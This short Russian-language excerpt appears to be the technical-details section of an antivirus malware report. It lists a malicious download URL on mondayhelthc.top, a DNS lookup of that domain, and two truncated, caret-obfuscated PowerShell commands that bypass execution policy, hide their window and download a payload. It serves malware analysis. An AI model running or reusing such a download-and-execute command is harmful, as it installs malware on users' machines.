Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ERshe^L^l.e^xe -exe^c^UT^io^N^pOLicy B^ypaS^s -n^O^pr^oF^il^e -^W^i^n^DO^WSTyL^e^ h^iD^dE^n (nEW^-o^b^J^ec^T^ S^ysTem.^NE^T^.weBcL^iEnT).^DOwnl^oadFilE('http://mondayhel...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "POW^ERshe^L^l.e^xe -exe^c^UT^io^N^pOLicy B^ypaS^s -n^O^pr^oF^il^e -^W^i^n^DO^WSTyL^e^ h^iD^dE^n (nEW^-o^b^J^ec^T^ S^ysTem.^NE^T^.weBcL^iEnT).^DOwnl^oadFilE('http://mondayhel...' (со скрытым окном)